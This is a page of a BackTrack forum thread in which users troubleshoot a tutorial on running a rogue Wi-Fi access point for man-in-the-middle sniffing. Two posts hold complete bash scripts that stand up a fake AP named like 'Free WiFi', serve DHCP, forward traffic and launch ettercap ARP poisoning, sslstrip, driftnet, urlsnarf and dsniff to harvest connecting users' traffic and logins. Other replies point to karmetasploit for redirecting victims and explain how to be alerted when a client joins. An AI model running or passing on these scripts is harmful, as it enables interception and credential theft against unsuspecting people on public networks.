Page 3 of 8 FirstFirst 12345 ... LastLast
Results 21 to 30 of 72

Thread: Lucafa's tutorial: softAP with internet connection and MITM sniffing

  1. #21
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    5

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    I can ping the host or call it softAP, I have internet on the host machine aka eth1. but still can't ping or surf... I have answered the questions you asked below:

    ap/dc; what wireless card are you using? awus36h

    A: Make sure you've got what's NEEDED(look at the beginning of my tutorial) checked

    B: Try playing around with your wireless card's MTU values
    (ifconfig wlan0 MTU 1400, 1500 or 1800, and ifconfig mon0 MTU 1400, 1500, or 1800, mess around with some combinations)
    What is MTU values?

    C: Maybe the MITM tools are causing you trouble. try again without them, do all the steps from 1 to 7, and leave this command out: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    I have not tried the MITM`n tools yet

    D: If it still doesn't work and you happen to have got a second pc/laptop, repeat all tutorial's steps on this different machine to see if it helps. I've also got some problems with fake ap's on my laptop, it only works on my older pc.
    I have not tried that yet

    cheers,

  2. #22
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    5

    Question help with fake ap and proxy settings

    im trying to set up a fake ap with lucifers tutorial in the how to's and i need to know if i can get the client who connects to get there internet from my proxy connection, i currently use adb and my android phone for the connection on my copy of backtrack 4, i use proxoid to tether my connection and use adb command forward tcp:8080, but to use apt-get i have to use this command "export http_proxy=http://localhost:8080" in the konsole, if this sounds confusing believe me it was hard work to get it all done lol so if anyone has any easier suggestions that i can do to make it easier and get it to work with a fake ap, and also my package manager still thinks i dont have a connection when i clearly do lol

  3. #23
    Junior Member Lucifer's Avatar
    Join Date
    Feb 2010
    Posts
    75

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    - In order for it to work, you will need to try out the stuff I suggested.
    - What are MTU values? let me google that for you
    - Start of by trying the whole tutorial on a different pc/laptop.
    - If the same problem persists, then try my C suggestion, and when your fake ap is up (without the MITM tools), begin by changing at0 MTU to 1400 (ifconfig at0 MTU 1400) and see if it works. if it does not, play around with wlan0 and mon0 MTU. keep on trying untill it works.
    - Report back when you've tried everything I suggested.

    Good luck man,

  4. #24
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    5

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    I have tried experiencing with the mtu and tried two different computers, I am seeing that getting IP takes along time and when its ok I still got NO internet:\
    Ihave have tried l3g10n`s tips but it fails on the " /var/run/dhcp3-server/dhcpd.pid " no such file/directory ... etc

    See underneath

    Cheers!

    Quote Originally Posted by l3g10n View Post
    #!/bin/bash #-------------- - Wifi WMITM Attack - n3n4umxc - Pastebin.com

    #----------------------------------------------------------------------#
    # This script is what I have taken from a script I found on the old BT
    # forums by Deathray. I modified it to fit my needs. -l3g10n
    #----------------------------------------------------------------------#
    echo -n "Enter the name of the interface connected to the internet, for example eth0: "
    read -e IFACE
    airmon-ng
    echo -n "Enter your wireless interface name, for example wlan0: "
    read -e WIFACE
    echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
    read -e ESSID
    kill `cat /var/run/dhcp3-server/dhcpd.pid`
    killall -9 dhcpd airbase-ng ettercap sslstrip driftnet urlsnarf
    airmon-ng stop $WIFACE
    ifconfig $WIFACE down
    airmon-ng start $WIFACE
    ifconfig $WIFACE up

    modprobe tun

    echo Airbase-ng is going to create our fake AP with the SSID we specified
    xterm -e airbase-ng -e "$ESSID" -P -C 30 -v mon0 &

    sleep 10

    echo Configuring interface created by airdrop-ng
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

    echo 'Setting up iptables to handle traffic seen by the airdrop-ng (at0) interface'
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
    iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE

    echo Creating a dhcpd.conf to assign addresses to clients that connect to us
    echo "default-lease-time 600;" > dhcpd.conf
    echo "max-lease-time 720;" >> dhcpd.conf
    echo "ddns-update-style none;" >> dhcpd.conf
    echo "authoritative;" >> dhcpd.conf
    echo "log-facility local7;" >> dhcpd.conf
    echo "subnet 10.0.0.0 netmask 255.255.255.0 {" >> dhcpd.conf
    echo "range 10.0.0.100 10.0.0.254;" >> dhcpd.conf
    echo "option routers 10.0.0.1;" >> dhcpd.conf
    echo "option domain-name-servers 8.8.8.8;" >> dhcpd.conf
    echo "}" >> dhcpd.conf

    echo 'DHCP server starting on our airdrop-ng interface (at0)'
    dhcpd3 -f -cf dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 &

    xterm -e tail -f /var/log/messages &
    #echo 'Launching ettercap, poisoning all hosts on the at0 interface's subnet'
    xterm -e ettercap -T -q -p -l ettercap$(date +%F-%H%M).log -i at0 // // &
    sleep 8

    echo 'Configuring ip forwarding'
    echo "1" > /proc/sys/net/ipv4/ip_forward

    echo 'Launching various tools'
    xterm -e sslstrip -a -k -f &
    driftnet -v -i at0 &
    xterm -e urlsnarf -i at0 &
    xterm -e dsniff -m -i at0 -d -w dsniff$(date +%F-%H%M).log &

  5. #25
    Just burned his ISO l3g10n's Avatar
    Join Date
    Feb 2010
    Posts
    13

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    Quote Originally Posted by ap/dc View Post
    I have tried experiencing with the mtu and tried two different computers, I am seeing that getting IP takes along time and when its ok I still got NO internet:\
    Ihave have tried l3g10n`s tips but it fails on the " /var/run/dhcp3-server/dhcpd.pid " no such file/directory ... etc

    See underneath

    Cheers!
    I always get that error....doesn't have an effect on the overall script. It's basically saying that it can't write the process id to a txt file. What is the output from the airbase-ng window?

  6. #26
    Just burned his ISO
    Join Date
    Feb 2010
    Location
    uk
    Posts
    23

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    Hi
    great tut works just great
    I have tried to get it to display a html page as a log in page and to warn that's it's insecure.
    Have got the apache2 server running with address 127.0.1.1
    entering 127.0.1.1 in browser on the attack machine i get the html page.
    Tried adjusting ip tables to redirect but NO success. any help please.
    Also how can I be alerted with a tone when a client attaches, I guess there is a sting I can monitor for attached clients.
    thanks

  7. #27
    Just burned his ISO l3g10n's Avatar
    Join Date
    Feb 2010
    Posts
    13

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    Quote Originally Posted by seanile View Post
    Hi
    great tut works just great
    I have tried to get it to display a html page as a log in page and to warn that's it's insecure.
    Have got the apache2 server running with address 127.0.1.1
    entering 127.0.1.1 in browser on the attack machine i get the html page.
    Tried adjusting ip tables to redirect but NO success. any help please.
    Also how can I be alerted with a tone when a client attaches, I guess there is a sting I can monitor for attached clients.
    thanks
    You may want to check out karmetasploit if you want users to be directed to your webpage. There is a script that is included in BT to autolaunch it: /pentest/wireless/kmsapng/kmsapng.sh . As far as monitoring, you could watch /var/log/messages for DHCP assignments or airbase-ng for client associtaions to your fakeap.

  8. #28
    Just burned his ISO l3g10n's Avatar
    Join Date
    Feb 2010
    Posts
    13

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    I made some more tweaks to the script. Let me know if you have any issues.

    WifiMITM-NEW.sh

    Code:
    #!/bin/bash
    killall -9 dhcpd3 airbase-ng ettercap sslstrip driftnet urlsnarf tail 
    
    echo 'Network Interfaces:'
    ifconfig | grep Link
    echo -n "Enter the name of the interface connected to the internet, for example eth0: "
    read -e IFACE
    airmon-ng
    echo -n "Enter your wireless interface name, for example wlan0: "
    read -e WIFACE
    echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
    read -e ESSID
    airmon-ng stop $WIFACE
    ifconfig $WIFACE down
    airmon-ng start $WIFACE
    ifconfig $WIFACE up
    
    modprobe tun
    
    #airbase-ng is going to create our fake AP with the SSID we specified
    xterm -bg black -fg yellow -e airbase-ng -e "$ESSID" -P -C 30 -v mon0  &
    
    sleep 10
    
    echo Configuring interface created by airdrop-ng
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0 
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    
    echo 'Setting up iptables to handle traffic seen by the airdrop-ng (at0) interface'
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
    iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
    
    echo Creating a dhcpd.conf to assign addresses to clients that connect to us
    echo "default-lease-time 600;" > dhcpd.conf
    echo "max-lease-time 720;"  >> dhcpd.conf
    echo "ddns-update-style none;" >> dhcpd.conf
    echo "authoritative;"  >> dhcpd.conf
    echo "log-facility local7;"  >> dhcpd.conf
    echo "subnet 10.0.0.0 netmask 255.255.255.0 {"  >> dhcpd.conf
    echo "range 10.0.0.100 10.0.0.254;"  >> dhcpd.conf
    echo "option routers 10.0.0.1;"  >> dhcpd.conf
    echo "option domain-name-servers 8.8.8.8;"  >> dhcpd.conf
    echo "}"  >> dhcpd.conf
    
    echo 'DHCP server starting on our airdrop-ng interface (at0)'
    dhcpd3 -f -cf dhcpd.conf at0 &
    echo "Launching DMESG"
    xterm -bg black -fg red -e tail -f /var/log/messages &
    echo "Launching ettercap, poisoning all hosts on the at0 interface's subnet"
    xterm -bg black -fg blue -e ettercap -T -q -p -l ettercap$(date +%F-%H%M).log -i at0 // // &
    sleep 8
    
    echo 'Configuring ip forwarding'
    echo "1" > /proc/sys/net/ipv4/ip_forward
    
    echo 'Launching various tools'
    sslstrip -a -k -f &
    driftnet -v -i at0 &
    xterm  -bg black -fg green -e urlsnarf  -i at0 &
    dsniff -m -i at0 -d -w dsniff$(date +%F-%H%M).log &

  9. #29
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    14

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    Thx l3g10n. Its working rly nice..
    Just 1 prob is this:
    Can't create PID file /var/run/dhcpd.pid: Permission denied.
    The change here i suppose break it somehow?
    dhcpd3 -f -cf dhcpd.conf at0 &
    And i like the colors but the blue of ettercap is making it difficult to read.

  10. #30
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    5

    Default Re: Lucafa's tutorial: softAP with internet connection and MITM sniffing

    thnx for the script legion! I'm very close now! >) I can connect, I get IP & I can also ping web sites. But I cant surf. Is there any settings in the script i need to configure?

Page 3 of 8 FirstFirst 12345 ... LastLast

Similar Threads

  1. Replies: 2
    Last Post: 08-23-2010, 10:53 AM
  2. rogue AP + MITM (tutorial or script request)
    By Lucifer in forum Beginners Forum
    Replies: 8
    Last Post: 04-12-2010, 12:40 AM
  3. internet connection problem?!
    By djamel in forum Beginners Forum
    Replies: 4
    Last Post: 02-27-2010, 06:08 AM
  4. Wireless Internet Connection Failing Somehow
    By shinjinkazama in forum Beginners Forum
    Replies: 1
    Last Post: 02-22-2010, 11:26 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •